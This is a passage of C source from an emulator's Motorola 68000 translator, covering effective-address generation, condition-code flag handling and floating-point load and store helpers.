* A NULL_QREG base means pc-relative. */ static TCGv gen_lea_indexed(CPUM68KState *env, DisasContext *s, TCGv base) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; uint16_t ext; TCGv add; TCGv tmp; uint32_t bd, od; offset = s->pc; ext = read_im16(env, s); if ((ext & 0x800) == 0 && !m68k_feature(s->env, M68K_FEATURE_WORD_INDEX)) return tcg_ctx->NULL_QREG; if (m68k_feature(s->env, M68K_FEATURE_M68000) && !m68k_feature(s->env, M68K_FEATURE_SCALED_INDEX)) { ext &= ~(3 << 9); } if (ext & 0x100) { /* full extension word format */ if (!m68k_feature(s->env, M68K_FEATURE_EXT_FULL)) return tcg_ctx->NULL_QREG; if ((ext & 0x30) > 0x10) { /* base displacement */ if ((ext & 0x30) == 0x20) { bd = (int16_t)read_im16(env, s); } else { bd = read_im32(env, s); } } else { bd = 0; } tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); if ((ext & 0x44) == 0) { /* pre-index */ add = gen_addr_index(s, ext, tmp); } else { add = tcg_ctx->NULL_QREG; } if ((ext & 0x80) == 0) { /* base not suppressed */ if (IS_NULL_QREG(base)) { base = mark_to_release(s, tcg_const_i32(tcg_ctx, offset + bd)); bd = 0; } if (!IS_NULL_QREG(add)) { tcg_gen_add_i32(tcg_ctx, tmp, add, base); add = tmp; } else { add = base; } } if (!IS_NULL_QREG(add)) { if (bd != 0) { tcg_gen_addi_i32(tcg_ctx, tmp, add, bd); add = tmp; } } else { add = mark_to_release(s, tcg_const_i32(tcg_ctx, bd)); } if ((ext & 3) != 0) { /* memory indirect */ base = mark_to_release(s, gen_load(s, OS_LONG, add, 0, IS_USER(s))); if ((ext & 0x44) == 4) { add = gen_addr_index(s, ext, tmp); tcg_gen_add_i32(tcg_ctx, tmp, add, base); add = tmp; } else { add = base; } if ((ext & 3) > 1) { /* outer displacement */ if ((ext & 3) == 2) { od = (int16_t)read_im16(env, s); } else { od = read_im32(env, s); } } else { od = 0; } if (od != 0) { tcg_gen_addi_i32(tcg_ctx, tmp, add, od); add = tmp; } } } else { /* brief extension word format */ tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); add = gen_addr_index(s, ext, tmp); if (!IS_NULL_QREG(base)) { tcg_gen_add_i32(tcg_ctx, tmp, add, base); if ((int8_t)ext) tcg_gen_addi_i32(tcg_ctx, tmp, tmp, (int8_t)ext); } else { tcg_gen_addi_i32(tcg_ctx, tmp, add, offset + (int8_t)ext); } add = tmp; } return add; } /* Sign or zero extend a value. */ static inline void gen_ext(TCGContext *tcg_ctx, TCGv res, TCGv val, int opsize, int sign) { switch (opsize) { case OS_BYTE: if (sign) { tcg_gen_ext8s_i32(tcg_ctx, res, val); } else { tcg_gen_ext8u_i32(tcg_ctx, res, val); } break; case OS_WORD: if (sign) { tcg_gen_ext16s_i32(tcg_ctx, res, val); } else { tcg_gen_ext16u_i32(tcg_ctx, res, val); } break; case OS_LONG: tcg_gen_mov_i32(tcg_ctx, res, val); break; default: g_assert_not_reached(); } } /* Evaluate all the CC flags. */ static void gen_flush_flags(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv t0, t1; switch (s->cc_op) { case CC_OP_FLAGS: return; case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); /* Compute signed overflow for addition. 
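Overflow occurs iff both operands have the same sign and the result's sign differs, i.e. V := (res ^ src) & ~(src ^ dest) in the sign bit; e.g. 0x7fffffff + 1 = 0x80000000 sets V, while 0xffffffff + 1 = 0 does not. 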
*/ t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); tcg_gen_sub_i32(tcg_ctx, t0, QREG_CC_N, QREG_CC_V); gen_ext(tcg_ctx, t0, t0, s->cc_op - CC_OP_ADDB, 1); tcg_gen_xor_i32(tcg_ctx, t1, QREG_CC_N, QREG_CC_V); tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_andc_i32(tcg_ctx, QREG_CC_V, t1, QREG_CC_V); tcg_temp_free(tcg_ctx, t1); break; case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); /* Compute signed overflow for subtraction. */ t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); tcg_gen_add_i32(tcg_ctx, t0, QREG_CC_N, QREG_CC_V); gen_ext(tcg_ctx, t0, t0, s->cc_op - CC_OP_SUBB, 1); tcg_gen_xor_i32(tcg_ctx, t1, QREG_CC_N, t0); tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_and_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, t1); tcg_temp_free(tcg_ctx, t1); break; case CC_OP_CMPB: case CC_OP_CMPW: case CC_OP_CMPL: tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_C, QREG_CC_N, QREG_CC_V); tcg_gen_sub_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N, QREG_CC_V); gen_ext(tcg_ctx, QREG_CC_Z, QREG_CC_Z, s->cc_op - CC_OP_CMPB, 1); /* Compute signed overflow for subtraction. */ t0 = tcg_temp_new(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, t0, QREG_CC_Z, QREG_CC_N); tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, QREG_CC_N); tcg_gen_and_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, QREG_CC_Z); break; case CC_OP_LOGIC: tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); tcg_gen_movi_i32(tcg_ctx, QREG_CC_C, 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); break; case CC_OP_DYNAMIC: gen_helper_flush_flags(tcg_ctx, tcg_ctx->cpu_env, QREG_CC_OP); s->cc_op_synced = 1; break; default: t0 = tcg_const_i32(tcg_ctx, s->cc_op); gen_helper_flush_flags(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); s->cc_op_synced = 1; break; } /* Note that flush_flags also assigned to env->cc_op. 
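(the helper stores CC_OP_FLAGS there), so on those paths cc_op_synced was already set above without emitting a separate move of QREG_CC_OP. 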
*/ s->cc_op = CC_OP_FLAGS; } static inline TCGv gen_extend(DisasContext *s, TCGv val, int opsize, int sign) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; if (opsize == OS_LONG) { tmp = val; } else { tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); gen_ext(tcg_ctx, tmp, val, opsize, sign); } return tmp; } static void gen_logic_cc(DisasContext *s, TCGv val, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_ext(tcg_ctx, QREG_CC_N, val, opsize, 1); set_cc_op(s, CC_OP_LOGIC); } static void gen_update_cc_cmp(DisasContext *s, TCGv dest, TCGv src, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_mov_i32(tcg_ctx, QREG_CC_N, dest); tcg_gen_mov_i32(tcg_ctx, QREG_CC_V, src); set_cc_op(s, CC_OP_CMPB + opsize); } static void gen_update_cc_add(TCGContext *tcg_ctx, TCGv dest, TCGv src, int opsize) { gen_ext(tcg_ctx, QREG_CC_N, dest, opsize, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_V, src); } static inline int opsize_bytes(int opsize) { switch (opsize) { case OS_BYTE: return 1; case OS_WORD: return 2; case OS_LONG: return 4; case OS_SINGLE: return 4; case OS_DOUBLE: return 8; case OS_EXTENDED: return 12; case OS_PACKED: return 12; default: // g_assert_not_reached(); return 0; } } static inline int insn_opsize(int insn) { switch ((insn >> 6) & 3) { case 0: return OS_BYTE; case 1: return OS_WORD; case 2: return OS_LONG; default: // g_assert_not_reached(); return 0; } } static inline int ext_opsize(int ext, int pos) { switch ((ext >> pos) & 7) { case 0: return OS_LONG; case 1: return OS_SINGLE; case 2: return OS_EXTENDED; case 3: return OS_PACKED; case 4: return OS_WORD; case 5: return OS_DOUBLE; case 6: return OS_BYTE; default: // g_assert_not_reached(); return 0; } } /* * Assign value to a register. If the width is less than the register width * only the low part of the register is set. */ static void gen_partset_reg(TCGContext *tcg_ctx, int opsize, TCGv reg, TCGv val) { TCGv tmp; switch (opsize) { case OS_BYTE: tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffffff00); tmp = tcg_temp_new(tcg_ctx); tcg_gen_ext8u_i32(tcg_ctx, tmp, val); tcg_gen_or_i32(tcg_ctx, reg, reg, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_WORD: tcg_gen_andi_i32(tcg_ctx, reg, reg, 0xffff0000); tmp = tcg_temp_new(tcg_ctx); tcg_gen_ext16u_i32(tcg_ctx, tmp, val); tcg_gen_or_i32(tcg_ctx, reg, reg, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_LONG: case OS_SINGLE: tcg_gen_mov_i32(tcg_ctx, reg, val); break; default: g_assert_not_reached(); } } /* * Generate code for an "effective address". Does not adjust the base * register for autoincrement addressing modes. */ static TCGv gen_lea_mode(CPUM68KState *env, DisasContext *s, int mode, int reg0, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv tmp; uint16_t ext; uint32_t offset; switch (mode) { case 0: /* Data register direct. */ case 1: /* Address register direct. */ return tcg_ctx->NULL_QREG; case 3: /* Indirect postincrement. */ if (opsize == OS_UNSIZED) { return tcg_ctx->NULL_QREG; } /* fallthru */ case 2: /* Indirect register */ return get_areg(s, reg0); case 4: /* Indirect predecrement. */ if (opsize == OS_UNSIZED) { return tcg_ctx->NULL_QREG; } reg = get_areg(s, reg0); tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); if (reg0 == 7 && opsize == OS_BYTE && m68k_feature(s->env, M68K_FEATURE_M68000)) { tcg_gen_subi_i32(tcg_ctx, tmp, reg, 2); } else { tcg_gen_subi_i32(tcg_ctx, tmp, reg, opsize_bytes(opsize)); } return tmp; case 5: /* Indirect displacement. 
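(d16,An): the signed 16-bit displacement read below is added to the address register, e.g. 8(%a0) addresses a0 + 8. 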
*/ reg = get_areg(s, reg0); tmp = mark_to_release(s, tcg_temp_new(tcg_ctx)); ext = read_im16(env, s); tcg_gen_addi_i32(tcg_ctx, tmp, reg, (int16_t)ext); return tmp; case 6: /* Indirect index + displacement. */ reg = get_areg(s, reg0); return gen_lea_indexed(env, s, reg); case 7: /* Other */ switch (reg0) { case 0: /* Absolute short. */ offset = (int16_t)read_im16(env, s); return mark_to_release(s, tcg_const_i32(tcg_ctx, offset)); case 1: /* Absolute long. */ offset = read_im32(env, s); return mark_to_release(s, tcg_const_i32(tcg_ctx, offset)); case 2: /* pc displacement */ offset = s->pc; offset += (int16_t)read_im16(env, s); return mark_to_release(s, tcg_const_i32(tcg_ctx, offset)); case 3: /* pc index+displacement. */ return gen_lea_indexed(env, s, tcg_ctx->NULL_QREG); case 4: /* Immediate. */ default: return tcg_ctx->NULL_QREG; } } /* Should never happen. */ return tcg_ctx->NULL_QREG; } static TCGv gen_lea(CPUM68KState *env, DisasContext *s, uint16_t insn, int opsize) { int mode = extract32(insn, 3, 3); int reg0 = REG(insn, 0); return gen_lea_mode(env, s, mode, reg0, opsize); } /* * Generate code to load/store a value from/into an EA. If WHAT is * EA_STORE this is a write, otherwise it is a read (EA_LOADS sign * extends, EA_LOADU zero extends). ADDRP is non-null for readwrite * operands. */ static TCGv gen_ea_mode(CPUM68KState *env, DisasContext *s, int mode, int reg0, int opsize, TCGv val, TCGv *addrp, ea_what what, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg, tmp, result; int32_t offset; switch (mode) { case 0: /* Data register direct. */ reg = tcg_ctx->cpu_dregs[reg0]; if (what == EA_STORE) { gen_partset_reg(tcg_ctx, opsize, reg, val); return tcg_ctx->store_dummy; } else { return gen_extend(s, reg, opsize, what == EA_LOADS); } case 1: /* Address register direct. */ reg = get_areg(s, reg0); if (what == EA_STORE) { tcg_gen_mov_i32(tcg_ctx, reg, val); return tcg_ctx->store_dummy; } else { return gen_extend(s, reg, opsize, what == EA_LOADS); } case 2: /* Indirect register */ reg = get_areg(s, reg0); return gen_ldst(s, opsize, reg, val, what, index); case 3: /* Indirect postincrement. */ reg = get_areg(s, reg0); result = gen_ldst(s, opsize, reg, val, what, index); if (what == EA_STORE || !addrp) { TCGv tmp = tcg_temp_new(tcg_ctx); if (reg0 == 7 && opsize == OS_BYTE && m68k_feature(s->env, M68K_FEATURE_M68000)) { tcg_gen_addi_i32(tcg_ctx, tmp, reg, 2); } else { tcg_gen_addi_i32(tcg_ctx, tmp, reg, opsize_bytes(opsize)); } delay_set_areg(s, reg0, tmp, true); } return result; case 4: /* Indirect predecrement. */ if (addrp && what == EA_STORE) { tmp = *addrp; } else { tmp = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(tmp)) { return tmp; } if (addrp) { *addrp = tmp; } } result = gen_ldst(s, opsize, tmp, val, what, index); if (what == EA_STORE || !addrp) { delay_set_areg(s, reg0, tmp, false); } return result; case 5: /* Indirect displacement. */ case 6: /* Indirect index + displacement. */ do_indirect: if (addrp && what == EA_STORE) { tmp = *addrp; } else { tmp = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(tmp)) { return tmp; } if (addrp) { *addrp = tmp; } } return gen_ldst(s, opsize, tmp, val, what, index); case 7: /* Other */ switch (reg0) { case 0: /* Absolute short. */ case 1: /* Absolute long. */ case 2: /* pc displacement */ case 3: /* pc index+displacement. */ goto do_indirect; case 4: /* Immediate. */ /* Sign extend values for consistency. 
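E.g. the byte immediate 0xff reads back as 0xffffffff under EA_LOADS but as 0x000000ff under EA_LOADU, matching what gen_load would produce for the same access. 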
*/ switch (opsize) { case OS_BYTE: if (what == EA_LOADS) { offset = (int8_t)read_im8(env, s); } else { offset = read_im8(env, s); } break; case OS_WORD: if (what == EA_LOADS) { offset = (int16_t)read_im16(env, s); } else { offset = read_im16(env, s); } break; case OS_LONG: offset = read_im32(env, s); break; default: g_assert_not_reached(); } return mark_to_release(s, tcg_const_i32(tcg_ctx, offset)); default: return tcg_ctx->NULL_QREG; } } /* Should never happen. */ return tcg_ctx->NULL_QREG; } static TCGv gen_ea(CPUM68KState *env, DisasContext *s, uint16_t insn, int opsize, TCGv val, TCGv *addrp, ea_what what, int index) { int mode = extract32(insn, 3, 3); int reg0 = REG(insn, 0); return gen_ea_mode(env, s, mode, reg0, opsize, val, addrp, what, index); } static TCGv_ptr gen_fp_ptr(TCGContext *tcg_ctx, int freg) { TCGv_ptr fp = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, fp, tcg_ctx->cpu_env, offsetof(CPUM68KState, fregs[freg])); return fp; } static TCGv_ptr gen_fp_result_ptr(TCGContext *tcg_ctx) { TCGv_ptr fp = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, fp, tcg_ctx->cpu_env, offsetof(CPUM68KState, fp_result)); return fp; } static void gen_fp_move(TCGContext *tcg_ctx, TCGv_ptr dest, TCGv_ptr src) { TCGv t32; TCGv_i64 t64; t32 = tcg_temp_new(tcg_ctx); tcg_gen_ld16u_i32(tcg_ctx, t32, src, offsetof(FPReg, l.upper)); tcg_gen_st16_i32(tcg_ctx, t32, dest, offsetof(FPReg, l.upper)); tcg_temp_free(tcg_ctx, t32); t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, t64, src, offsetof(FPReg, l.lower)); tcg_gen_st_i64(tcg_ctx, t64, dest, offsetof(FPReg, l.lower)); tcg_temp_free_i64(tcg_ctx, t64); } static void gen_load_fp(DisasContext *s, int opsize, TCGv addr, TCGv_ptr fp, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; TCGv_i64 t64; t64 = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); switch (opsize) { case OS_BYTE: tcg_gen_qemu_ld8s(tcg_ctx, tmp, addr, index); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_WORD: tcg_gen_qemu_ld16s(tcg_ctx, tmp, addr, index); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_LONG: tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_SINGLE: tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); gen_helper_extf32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_DOUBLE: tcg_gen_qemu_ld64(tcg_ctx, t64, addr, index); gen_helper_extf64(tcg_ctx, tcg_ctx->cpu_env, fp, t64); break; case OS_EXTENDED: if (m68k_feature(s->env, M68K_FEATURE_CF_FPU)) { gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; } tcg_gen_qemu_ld32u(tcg_ctx, tmp, addr, index); tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); tcg_gen_st16_i32(tcg_ctx, tmp, fp, offsetof(FPReg, l.upper)); tcg_gen_addi_i32(tcg_ctx, tmp, addr, 4); tcg_gen_qemu_ld64(tcg_ctx, t64, tmp, index); tcg_gen_st_i64(tcg_ctx, t64, fp, offsetof(FPReg, l.lower)); break; case OS_PACKED: /* * unimplemented data type on 68040/ColdFire * FIXME if needed for another FPU */ gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; default: g_assert_not_reached(); } tcg_temp_free(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, t64); } static void gen_store_fp(DisasContext *s, int opsize, TCGv addr, TCGv_ptr fp, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; TCGv_i64 t64; t64 = tcg_temp_new_i64(tcg_ctx); tmp = tcg_temp_new(tcg_ctx); switch (opsize) { case OS_BYTE: gen_helper_reds32(tcg_ctx, tmp, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st8(tcg_ctx, tmp, addr, index); break; case OS_WORD: 
gen_helper_reds32(tcg_ctx, tmp, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st16(tcg_ctx, tmp, addr, index); break; case OS_LONG: gen_helper_reds32(tcg_ctx, tmp, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st32(tcg_ctx, tmp, addr, index); break; case OS_SINGLE: gen_helper_redf32(tcg_ctx, tmp, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st32(tcg_ctx, tmp, addr, index); break; case OS_DOUBLE: gen_helper_redf64(tcg_ctx, t64, tcg_ctx->cpu_env, fp); tcg_gen_qemu_st64(tcg_ctx, t64, addr, index); break; case OS_EXTENDED: if (m68k_feature(s->env, M68K_FEATURE_CF_FPU)) { gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; } tcg_gen_ld16u_i32(tcg_ctx, tmp, fp, offsetof(FPReg, l.upper)); tcg_gen_shli_i32(tcg_ctx, tmp, tmp, 16); tcg_gen_qemu_st32(tcg_ctx, tmp, addr, index); tcg_gen_addi_i32(tcg_ctx, tmp, addr, 4); tcg_gen_ld_i64(tcg_ctx, t64, fp, offsetof(FPReg, l.lower)); tcg_gen_qemu_st64(tcg_ctx, t64, tmp, index); break; case OS_PACKED: /* * unimplemented data type on 68040/ColdFire * FIXME if needed for another FPU */ gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; default: g_assert_not_reached(); } tcg_temp_free(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, t64); } static void gen_ldst_fp(DisasContext *s, int opsize, TCGv addr, TCGv_ptr fp, ea_what what, int index) { if (what == EA_STORE) { gen_store_fp(s, opsize, addr, fp, index); } else { gen_load_fp(s, opsize, addr, fp, index); } } static int gen_ea_mode_fp(CPUM68KState *env, DisasContext *s, int mode, int reg0, int opsize, TCGv_ptr fp, ea_what what, int index) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg, addr, tmp; TCGv_i64 t64; switch (mode) { case 0: /* Data register direct. */ reg = tcg_ctx->cpu_dregs[reg0]; if (what == EA_STORE) { switch (opsize) { case OS_BYTE: case OS_WORD: case OS_LONG: gen_helper_reds32(tcg_ctx, reg, tcg_ctx->cpu_env, fp); break; case OS_SINGLE: gen_helper_redf32(tcg_ctx, reg, tcg_ctx->cpu_env, fp); break; default: g_assert_not_reached(); } } else { tmp = tcg_temp_new(tcg_ctx); switch (opsize) { case OS_BYTE: tcg_gen_ext8s_i32(tcg_ctx, tmp, reg); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_WORD: tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); break; case OS_LONG: gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, reg); break; case OS_SINGLE: gen_helper_extf32(tcg_ctx, tcg_ctx->cpu_env, fp, reg); break; default: g_assert_not_reached(); } tcg_temp_free(tcg_ctx, tmp); } return 0; case 1: /* Address register direct. */ return -1; case 2: /* Indirect register */ addr = get_areg(s, reg0); gen_ldst_fp(s, opsize, addr, fp, what, index); return 0; case 3: /* Indirect postincrement. */ addr = tcg_ctx->cpu_aregs[reg0]; gen_ldst_fp(s, opsize, addr, fp, what, index); tcg_gen_addi_i32(tcg_ctx, addr, addr, opsize_bytes(opsize)); return 0; case 4: /* Indirect predecrement. */ addr = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(addr)) { return -1; } gen_ldst_fp(s, opsize, addr, fp, what, index); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_aregs[reg0], addr); return 0; case 5: /* Indirect displacement. */ case 6: /* Indirect index + displacement. */ do_indirect: addr = gen_lea_mode(env, s, mode, reg0, opsize); if (IS_NULL_QREG(addr)) { return -1; } gen_ldst_fp(s, opsize, addr, fp, what, index); return 0; case 7: /* Other */ switch (reg0) { case 0: /* Absolute short. */ case 1: /* Absolute long. */ case 2: /* pc displacement */ case 3: /* pc index+displacement. */ goto do_indirect; case 4: /* Immediate. 
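The operand follows in the instruction stream in the size selected by the extension word; a store to an immediate is rejected by the -1 return below, which callers turn into an addressing fault. 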
*/ if (what == EA_STORE) { return -1; } switch (opsize) { case OS_BYTE: tmp = tcg_const_i32(tcg_ctx, (int8_t)read_im8(env, s)); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_WORD: tmp = tcg_const_i32(tcg_ctx, (int16_t)read_im16(env, s)); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_LONG: tmp = tcg_const_i32(tcg_ctx, read_im32(env, s)); gen_helper_exts32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_SINGLE: tmp = tcg_const_i32(tcg_ctx, read_im32(env, s)); gen_helper_extf32(tcg_ctx, tcg_ctx->cpu_env, fp, tmp); tcg_temp_free(tcg_ctx, tmp); break; case OS_DOUBLE: t64 = tcg_const_i64(tcg_ctx, read_im64(env, s)); gen_helper_extf64(tcg_ctx, tcg_ctx->cpu_env, fp, t64); tcg_temp_free_i64(tcg_ctx, t64); break; case OS_EXTENDED: if (m68k_feature(s->env, M68K_FEATURE_CF_FPU)) { gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; } tmp = tcg_const_i32(tcg_ctx, read_im32(env, s) >> 16); tcg_gen_st16_i32(tcg_ctx, tmp, fp, offsetof(FPReg, l.upper)); tcg_temp_free(tcg_ctx, tmp); t64 = tcg_const_i64(tcg_ctx, read_im64(env, s)); tcg_gen_st_i64(tcg_ctx, t64, fp, offsetof(FPReg, l.lower)); tcg_temp_free_i64(tcg_ctx, t64); break; case OS_PACKED: /* * unimplemented data type on 68040/ColdFire * FIXME if needed for another FPU */ gen_exception(s, s->base.pc_next, EXCP_FP_UNIMP); break; default: g_assert_not_reached(); } return 0; default: return -1; } } return -1; } static int gen_ea_fp(CPUM68KState *env, DisasContext *s, uint16_t insn, int opsize, TCGv_ptr fp, ea_what what, int index) { int mode = extract32(insn, 3, 3); int reg0 = REG(insn, 0); return gen_ea_mode_fp(env, s, mode, reg0, opsize, fp, what, index); } typedef struct { TCGCond tcond; bool g1; bool g2; TCGv v1; TCGv v2; } DisasCompare; static void gen_cc_cond(DisasCompare *c, DisasContext *s, int cond) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp, tmp2; TCGCond tcond; CCOp op = s->cc_op; /* The CC_OP_CMP form can handle most normal comparisons directly. */ if (op == CC_OP_CMPB || op == CC_OP_CMPW || op == CC_OP_CMPL) { c->g1 = c->g2 = 1; c->v1 = QREG_CC_N; c->v2 = QREG_CC_V; switch (cond) { case 2: /* HI */ case 3: /* LS */ tcond = TCG_COND_LEU; goto done; case 4: /* CC */ case 5: /* CS */ tcond = TCG_COND_LTU; goto done; case 6: /* NE */ case 7: /* EQ */ tcond = TCG_COND_EQ; goto done; case 10: /* PL */ case 11: /* MI */ c->g1 = c->g2 = 0; c->v2 = tcg_const_i32(tcg_ctx, 0); c->v1 = tmp = tcg_temp_new(tcg_ctx); tcg_gen_sub_i32(tcg_ctx, tmp, QREG_CC_N, QREG_CC_V); gen_ext(tcg_ctx, tmp, tmp, op - CC_OP_CMPB, 1); /* fallthru */ case 12: /* GE */ case 13: /* LT */ tcond = TCG_COND_LT; goto done; case 14: /* GT */ case 15: /* LE */ tcond = TCG_COND_LE; goto done; } } c->g1 = 1; c->g2 = 0; c->v2 = tcg_const_i32(tcg_ctx, 0); switch (cond) { case 0: /* T */ case 1: /* F */ c->v1 = c->v2; tcond = TCG_COND_NEVER; goto done; case 14: /* GT (!(Z || (N ^ V))) */ case 15: /* LE (Z || (N ^ V)) */ /* * Logic operations clear V, which simplifies LE to (Z || N), * and since Z and N are co-located, this becomes a normal * comparison vs N. */ if (op == CC_OP_LOGIC) { c->v1 = QREG_CC_N; tcond = TCG_COND_LE; goto done; } break; case 12: /* GE (!(N ^ V)) */ case 13: /* LT (N ^ V) */ /* Logic operations clear V, which simplifies this to N. */ if (op != CC_OP_LOGIC) { break; } /* fallthru */ case 10: /* PL (!N) */ case 11: /* MI (N) */ /* Several cases represent N normally. 
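For the ADD/SUB/LOGIC cc_ops QREG_CC_N already holds the sign-extended result, so PL/MI reduce to a signed comparison of N against zero. 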
*/ if (op == CC_OP_ADDB || op == CC_OP_ADDW || op == CC_OP_ADDL || op == CC_OP_SUBB || op == CC_OP_SUBW || op == CC_OP_SUBL || op == CC_OP_LOGIC) { c->v1 = QREG_CC_N; tcond = TCG_COND_LT; goto done; } break; case 6: /* NE (!Z) */ case 7: /* EQ (Z) */ /* Some cases fold Z into N. */ if (op == CC_OP_ADDB || op == CC_OP_ADDW || op == CC_OP_ADDL || op == CC_OP_SUBB || op == CC_OP_SUBW || op == CC_OP_SUBL || op == CC_OP_LOGIC) { tcond = TCG_COND_EQ; c->v1 = QREG_CC_N; goto done; } break; case 4: /* CC (!C) */ case 5: /* CS (C) */ /* Some cases fold C into X. */ if (op == CC_OP_ADDB || op == CC_OP_ADDW || op == CC_OP_ADDL || op == CC_OP_SUBB || op == CC_OP_SUBW || op == CC_OP_SUBL) { tcond = TCG_COND_NE; c->v1 = QREG_CC_X; goto done; } /* fallthru */ case 8: /* VC (!V) */ case 9: /* VS (V) */ /* Logic operations clear V and C. */ if (op == CC_OP_LOGIC) { tcond = TCG_COND_NEVER; c->v1 = c->v2; goto done; } break; } /* Otherwise, flush flag state to CC_OP_FLAGS. */ gen_flush_flags(s); switch (cond) { case 0: /* T */ case 1: /* F */ default: /* Invalid, or handled above. */ abort(); case 2: /* HI (!C && !Z) -> !(C || Z)*/ case 3: /* LS (C || Z) */ c->v1 = tmp = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_setcond_i32(tcg_ctx, TCG_COND_EQ, tmp, QREG_CC_Z, c->v2); tcg_gen_or_i32(tcg_ctx, tmp, tmp, QREG_CC_C); tcond = TCG_COND_NE; break; case 4: /* CC (!C) */ case 5: /* CS (C) */ c->v1 = QREG_CC_C; tcond = TCG_COND_NE; break; case 6: /* NE (!Z) */ case 7: /* EQ (Z) */ c->v1 = QREG_CC_Z; tcond = TCG_COND_EQ; break; case 8: /* VC (!V) */ case 9: /* VS (V) */ c->v1 = QREG_CC_V; tcond = TCG_COND_LT; break; case 10: /* PL (!N) */ case 11: /* MI (N) */ c->v1 = QREG_CC_N; tcond = TCG_COND_LT; break; case 12: /* GE (!(N ^ V)) */ case 13: /* LT (N ^ V) */ c->v1 = tmp = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_xor_i32(tcg_ctx, tmp, QREG_CC_N, QREG_CC_V); tcond = TCG_COND_LT; break; case 14: /* GT (!(Z || (N ^ V))) */ case 15: /* LE (Z || (N ^ V)) */ c->v1 = tmp = tcg_temp_new(tcg_ctx); c->g1 = 0; tcg_gen_setcond_i32(tcg_ctx, TCG_COND_EQ, tmp, QREG_CC_Z, c->v2); tcg_gen_neg_i32(tcg_ctx, tmp, tmp); 